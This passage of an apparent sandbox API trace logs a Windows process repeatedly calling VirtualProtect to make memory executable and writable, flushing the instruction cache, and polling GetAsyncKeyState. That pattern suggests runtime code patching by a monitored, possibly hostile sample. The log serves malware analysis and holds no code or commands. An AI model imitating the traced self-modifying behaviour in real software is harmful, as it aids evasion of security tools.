GetCurrentProcess () returned 0xffffffff [0112.102] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601854, dwSize=0x14) returned 1 [0112.102] VirtualProtect (in: lpAddress=0xf601854, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.103] GetCurrentProcess () returned 0xffffffff [0112.103] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601855, dwSize=0x2) returned 1 [0112.103] GetCurrentProcess () returned 0xffffffff [0112.103] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601874, dwSize=0x14) returned 1 [0112.103] VirtualProtect (in: lpAddress=0xf601874, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.104] GetCurrentProcess () returned 0xffffffff [0112.104] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601875, dwSize=0x2) returned 1 [0112.104] GetCurrentProcess () returned 0xffffffff [0112.104] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0048, dwSize=0x14) returned 1 [0112.104] VirtualProtect (in: lpAddress=0xf5d0048, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.104] GetCurrentProcess () returned 0xffffffff [0112.104] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0049, dwSize=0x2) returned 1 [0112.104] GetCurrentProcess () returned 0xffffffff [0112.104] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0068, dwSize=0x14) returned 1 [0112.104] VirtualProtect (in: lpAddress=0xf5d0068, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.105] GetCurrentProcess () returned 0xffffffff [0112.105] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0069, dwSize=0x2) returned 1 [0112.105] GetCurrentProcess () returned 0xffffffff [0112.105] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0088, dwSize=0x14) returned 1 [0112.105] VirtualProtect (in: lpAddress=0xf5d0088, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.106] GetCurrentProcess () returned 0xffffffff [0112.106] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0089, dwSize=0x2) returned 1 [0112.106] GetCurrentProcess () returned 0xffffffff [0112.106] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a8, dwSize=0x14) returned 1 [0112.106] VirtualProtect (in: lpAddress=0xf5d00a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.106] GetCurrentProcess () returned 0xffffffff [0112.106] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a9, dwSize=0x2) returned 1 [0112.106] GetCurrentProcess () returned 0xffffffff [0112.106] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c8, dwSize=0x14) returned 1 [0112.106] VirtualProtect (in: lpAddress=0xf5d00c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.107] GetCurrentProcess () returned 0xffffffff [0112.107] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c9, dwSize=0x2) returned 1 [0112.107] GetCurrentProcess () returned 0xffffffff [0112.107] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e8, dwSize=0x14) returned 1 [0112.107] VirtualProtect (in: lpAddress=0xf5d00e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.108] GetCurrentProcess () returned 0xffffffff [0112.108] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e9, dwSize=0x2) returned 1 [0112.108] GetCurrentProcess () returned 0xffffffff [0112.108] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0108, dwSize=0x14) returned 1 [0112.108] VirtualProtect (in: lpAddress=0xf5d0108, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.108] GetCurrentProcess () returned 0xffffffff [0112.108] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0109, dwSize=0x2) returned 1 [0112.108] GetCurrentProcess () returned 0xffffffff [0112.109] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0128, dwSize=0x14) returned 1 [0112.109] VirtualProtect (in: lpAddress=0xf5d0128, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.109] GetCurrentProcess () returned 0xffffffff [0112.109] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0129, dwSize=0x2) returned 1 [0112.109] GetCurrentProcess () returned 0xffffffff [0112.109] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0148, dwSize=0x14) returned 1 [0112.109] VirtualProtect (in: lpAddress=0xf5d0148, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.110] GetCurrentProcess () returned 0xffffffff [0112.110] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0149, dwSize=0x2) returned 1 [0112.110] GetCurrentProcess () returned 0xffffffff [0112.110] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0168, dwSize=0x14) returned 1 [0112.110] VirtualProtect (in: lpAddress=0xf5d0168, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.116] GetCurrentProcess () returned 0xffffffff [0112.116] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0169, dwSize=0x2) returned 1 [0112.116] GetCurrentProcess () returned 0xffffffff [0112.116] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0188, dwSize=0x14) returned 1 [0112.116] VirtualProtect (in: lpAddress=0xf5d0188, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.117] GetCurrentProcess () returned 0xffffffff [0112.117] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0189, dwSize=0x2) returned 1 [0112.117] GetCurrentProcess () returned 0xffffffff [0112.117] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a8, dwSize=0x14) returned 1 [0112.117] VirtualProtect (in: lpAddress=0xf5d01a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.118] GetCurrentProcess () returned 0xffffffff [0112.118] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a9, dwSize=0x2) returned 1 [0112.118] GetCurrentProcess () returned 0xffffffff [0112.118] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c8, dwSize=0x14) returned 1 [0112.118] VirtualProtect (in: lpAddress=0xf5d01c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.118] GetCurrentProcess () returned 0xffffffff [0112.118] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c9, dwSize=0x2) returned 1 [0112.118] GetCurrentProcess () returned 0xffffffff [0112.118] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e8, dwSize=0x14) returned 1 [0112.118] VirtualProtect (in: lpAddress=0xf5d01e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.119] GetCurrentProcess () returned 0xffffffff [0112.119] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e9, dwSize=0x2) returned 1 [0112.119] GetCurrentProcess () returned 0xffffffff [0112.119] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0208, dwSize=0x14) returned 1 [0112.119] VirtualProtect (in: lpAddress=0xf5d0208, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.119] GetCurrentProcess () returned 0xffffffff [0112.119] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0209, dwSize=0x2) returned 1 [0112.119] GetCurrentProcess () returned 0xffffffff [0112.119] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0228, dwSize=0x14) returned 1 [0112.119] VirtualProtect (in: lpAddress=0xf5d0228, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.120] GetCurrentProcess () returned 0xffffffff [0112.120] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0229, dwSize=0x2) returned 1 [0112.120] GetCurrentProcess () returned 0xffffffff [0112.120] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4868, dwSize=0x14) returned 1 [0112.120] VirtualProtect (in: lpAddress=0xc8b4868, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.120] GetCurrentProcess () returned 0xffffffff [0112.120] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4869, dwSize=0x2) returned 1 [0112.120] GetCurrentProcess () returned 0xffffffff [0112.120] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4888, dwSize=0x14) returned 1 [0112.120] VirtualProtect (in: lpAddress=0xc8b4888, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.121] GetCurrentProcess () returned 0xffffffff [0112.121] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4889, dwSize=0x2) returned 1 [0112.121] GetCurrentProcess () returned 0xffffffff [0112.121] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a8, dwSize=0x14) returned 1 [0112.121] VirtualProtect (in: lpAddress=0xc8b48a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.121] GetCurrentProcess () returned 0xffffffff [0112.121] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a9, dwSize=0x2) returned 1 [0112.122] GetAsyncKeyState (vKey=3) returned 0 [0112.122] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.122] CRetailMalloc_Alloc () returned 0xcc1b008 [0112.122] memcpy (in: _Dst=0xd015168, _Src=0x1976bc, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0112.122] memcpy (in: _Dst=0xcc1b028, _Src=0x197724, _Size=0x18 | out: _Dst=0xcc1b028) returned 0xcc1b028 [0112.122] CRetailMalloc_Realloc () returned 0xcc1b008 [0112.122] CRetailMalloc_Free () returned 0x1 [0112.123] GetCurrentProcess () returned 0xffffffff [0112.123] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601714, dwSize=0x14) returned 1 [0112.123] VirtualProtect (in: lpAddress=0xf601714, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.123] GetCurrentProcess () returned 0xffffffff [0112.123] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601715, dwSize=0x2) returned 1 [0112.123] GetCurrentProcess () returned 0xffffffff [0112.123] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601734, dwSize=0x14) returned 1 [0112.123] VirtualProtect (in: lpAddress=0xf601734, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.124] GetCurrentProcess () returned 0xffffffff [0112.124] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601735, dwSize=0x2) returned 1 [0112.124] GetCurrentProcess () returned 0xffffffff [0112.124] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601754, dwSize=0x14) returned 1 [0112.124] VirtualProtect (in: lpAddress=0xf601754, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.124] GetCurrentProcess () returned 0xffffffff [0112.124] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601755, dwSize=0x2) returned 1 [0112.124] GetCurrentProcess () returned 0xffffffff [0112.124] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601774, dwSize=0x14) returned 1 [0112.124] VirtualProtect (in: lpAddress=0xf601774, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.125] GetCurrentProcess () returned 0xffffffff [0112.125] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601775, dwSize=0x2) returned 1 [0112.125] GetCurrentProcess () returned 0xffffffff [0112.125] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601794, dwSize=0x14) returned 1 [0112.125] VirtualProtect (in: lpAddress=0xf601794, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.125] GetCurrentProcess () returned 0xffffffff [0112.125] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601795, dwSize=0x2) returned 1 [0112.125] GetCurrentProcess () returned 0xffffffff [0112.125] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b4, dwSize=0x14) returned 1 [0112.125] VirtualProtect (in: lpAddress=0xf6017b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.126] GetCurrentProcess () returned 0xffffffff [0112.126] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b5, dwSize=0x2) returned 1 [0112.126] GetCurrentProcess () returned 0xffffffff [0112.126] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d4, dwSize=0x14) returned 1 [0112.126] VirtualProtect (in: lpAddress=0xf6017d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.127] GetCurrentProcess () returned 0xffffffff [0112.127] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d5, dwSize=0x2) returned 1 [0112.127] GetCurrentProcess () returned 0xffffffff [0112.127] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f4, dwSize=0x14) returned 1 [0112.127] VirtualProtect (in: lpAddress=0xf6017f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.127] GetCurrentProcess () returned 0xffffffff [0112.127] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f5, dwSize=0x2) returned 1 [0112.127] GetCurrentProcess () returned 0xffffffff [0112.127] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601814, dwSize=0x14) returned 1 [0112.127] VirtualProtect (in: lpAddress=0xf601814, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.128] GetCurrentProcess () returned 0xffffffff [0112.128] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601815, dwSize=0x2) returned 1 [0112.128] GetCurrentProcess () returned 0xffffffff [0112.128] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601834, dwSize=0x14) returned 1 [0112.128] VirtualProtect (in: lpAddress=0xf601834, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.128] GetCurrentProcess () returned 0xffffffff [0112.128] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601835, dwSize=0x2) returned 1 [0112.128] GetCurrentProcess () returned 0xffffffff [0112.128] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601854, dwSize=0x14) returned 1 [0112.128] VirtualProtect (in: lpAddress=0xf601854, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.129] GetCurrentProcess () returned 0xffffffff [0112.129] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601855, dwSize=0x2) returned 1 [0112.129] GetCurrentProcess () returned 0xffffffff [0112.129] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601874, dwSize=0x14) returned 1 [0112.129] VirtualProtect (in: lpAddress=0xf601874, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.129] GetCurrentProcess () returned 0xffffffff [0112.129] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601875, dwSize=0x2) returned 1 [0112.129] GetCurrentProcess () returned 0xffffffff [0112.129] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0048, dwSize=0x14) returned 1 [0112.129] VirtualProtect (in: lpAddress=0xf5d0048, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.130] GetCurrentProcess () returned 0xffffffff [0112.130] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0049, dwSize=0x2) returned 1 [0112.130] GetCurrentProcess () returned 0xffffffff [0112.130] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0068, dwSize=0x14) returned 1 [0112.130] VirtualProtect (in: lpAddress=0xf5d0068, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.130] GetCurrentProcess () returned 0xffffffff [0112.130] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0069, dwSize=0x2) returned 1 [0112.130] GetCurrentProcess () returned 0xffffffff [0112.130] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0088, dwSize=0x14) returned 1 [0112.130] VirtualProtect (in: lpAddress=0xf5d0088, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.131] GetCurrentProcess () returned 0xffffffff [0112.131] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0089, dwSize=0x2) returned 1 [0112.131] GetCurrentProcess () returned 0xffffffff [0112.131] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a8, dwSize=0x14) returned 1 [0112.131] VirtualProtect (in: lpAddress=0xf5d00a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.131] GetCurrentProcess () returned 0xffffffff [0112.131] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a9, dwSize=0x2) returned 1 [0112.131] GetCurrentProcess () returned 0xffffffff [0112.131] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c8, dwSize=0x14) returned 1 [0112.131] VirtualProtect (in: lpAddress=0xf5d00c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.132] GetCurrentProcess () returned 0xffffffff [0112.132] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c9, dwSize=0x2) returned 1 [0112.132] GetCurrentProcess () returned 0xffffffff [0112.132] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e8, dwSize=0x14) returned 1 [0112.132] VirtualProtect (in: lpAddress=0xf5d00e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.132] GetCurrentProcess () returned 0xffffffff [0112.132] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e9, dwSize=0x2) returned 1 [0112.132] GetCurrentProcess () returned 0xffffffff [0112.132] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0108, dwSize=0x14) returned 1 [0112.132] VirtualProtect (in: lpAddress=0xf5d0108, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.132] GetCurrentProcess () returned 0xffffffff [0112.133] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0109, dwSize=0x2) returned 1 [0112.133] GetCurrentProcess () returned 0xffffffff [0112.133] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0128, dwSize=0x14) returned 1 [0112.133] VirtualProtect (in: lpAddress=0xf5d0128, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.133] GetCurrentProcess () returned 0xffffffff [0112.133] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0129, dwSize=0x2) returned 1 [0112.133] GetCurrentProcess () returned 0xffffffff [0112.133] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0148, dwSize=0x14) returned 1 [0112.133] VirtualProtect (in: lpAddress=0xf5d0148, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.133] GetCurrentProcess () returned 0xffffffff [0112.133] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0149, dwSize=0x2) returned 1 [0112.133] GetCurrentProcess () returned 0xffffffff [0112.134] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0168, dwSize=0x14) returned 1 [0112.134] VirtualProtect (in: lpAddress=0xf5d0168, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.134] GetCurrentProcess () returned 0xffffffff [0112.134] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0169, dwSize=0x2) returned 1 [0112.134] GetCurrentProcess () returned 0xffffffff [0112.134] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0188, dwSize=0x14) returned 1 [0112.134] VirtualProtect (in: lpAddress=0xf5d0188, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.135] GetCurrentProcess () returned 0xffffffff [0112.135] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0189, dwSize=0x2) returned 1 [0112.135] GetCurrentProcess () returned 0xffffffff [0112.135] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a8, dwSize=0x14) returned 1 [0112.135] VirtualProtect (in: lpAddress=0xf5d01a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.135] GetCurrentProcess () returned 0xffffffff [0112.135] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a9, dwSize=0x2) returned 1 [0112.135] GetCurrentProcess () returned 0xffffffff [0112.135] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c8, dwSize=0x14) returned 1 [0112.135] VirtualProtect (in: lpAddress=0xf5d01c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.136] GetCurrentProcess () returned 0xffffffff [0112.136] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c9, dwSize=0x2) returned 1 [0112.136] GetCurrentProcess () returned 0xffffffff [0112.136] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e8, dwSize=0x14) returned 1 [0112.136] VirtualProtect (in: lpAddress=0xf5d01e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.136] GetCurrentProcess () returned 0xffffffff [0112.136] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e9, dwSize=0x2) returned 1 [0112.136] GetCurrentProcess () returned 0xffffffff [0112.136] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0208, dwSize=0x14) returned 1 [0112.136] VirtualProtect (in: lpAddress=0xf5d0208, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.137] GetCurrentProcess () returned 0xffffffff [0112.137] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0209, dwSize=0x2) returned 1 [0112.137] GetCurrentProcess () returned 0xffffffff [0112.137] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0228, dwSize=0x14) returned 1 [0112.137] VirtualProtect (in: lpAddress=0xf5d0228, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.137] GetCurrentProcess () returned 0xffffffff [0112.137] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0229, dwSize=0x2) returned 1 [0112.137] GetCurrentProcess () returned 0xffffffff [0112.137] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4868, dwSize=0x14) returned 1 [0112.137] VirtualProtect (in: lpAddress=0xc8b4868, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.138] GetCurrentProcess () returned 0xffffffff [0112.138] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4869, dwSize=0x2) returned 1 [0112.138] GetCurrentProcess () returned 0xffffffff [0112.138] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4888, dwSize=0x14) returned 1 [0112.138] VirtualProtect (in: lpAddress=0xc8b4888, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.138] GetCurrentProcess () returned 0xffffffff [0112.138] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4889, dwSize=0x2) returned 1 [0112.138] GetCurrentProcess () returned 0xffffffff [0112.138] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a8, dwSize=0x14) returned 1 [0112.138] VirtualProtect (in: lpAddress=0xc8b48a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.139] GetCurrentProcess () returned 0xffffffff [0112.139] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a9, dwSize=0x2) returned 1 [0112.139] GetAsyncKeyState (vKey=3) returned 0 [0112.139] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.140] CRetailMalloc_Alloc () returned 0xcc1b068 [0112.140] memcpy (in: _Dst=0xd015168, _Src=0x1976bc, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0112.140] memcpy (in: _Dst=0xcc1b088, _Src=0x197724, _Size=0x18 | out: _Dst=0xcc1b088) returned 0xcc1b088 [0112.140] CRetailMalloc_Realloc () returned 0xcc1b068 [0112.140] CRetailMalloc_Free () returned 0x1 [0112.140] GetCurrentProcess () returned 0xffffffff [0112.140] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601714, dwSize=0x14) returned 1 [0112.140] VirtualProtect (in: lpAddress=0xf601714, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.142] GetCurrentProcess () returned 0xffffffff [0112.142] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601715, dwSize=0x2) returned 1 [0112.142] GetCurrentProcess () returned 0xffffffff [0112.142] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601734, dwSize=0x14) returned 1 [0112.143] VirtualProtect (in: lpAddress=0xf601734, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.143] GetCurrentProcess () returned 0xffffffff [0112.143] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601735, dwSize=0x2) returned 1 [0112.143] GetCurrentProcess () returned 0xffffffff [0112.143] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601754, dwSize=0x14) returned 1 [0112.143] VirtualProtect (in: lpAddress=0xf601754, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.143] GetCurrentProcess () returned 0xffffffff [0112.143] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601755, dwSize=0x2) returned 1 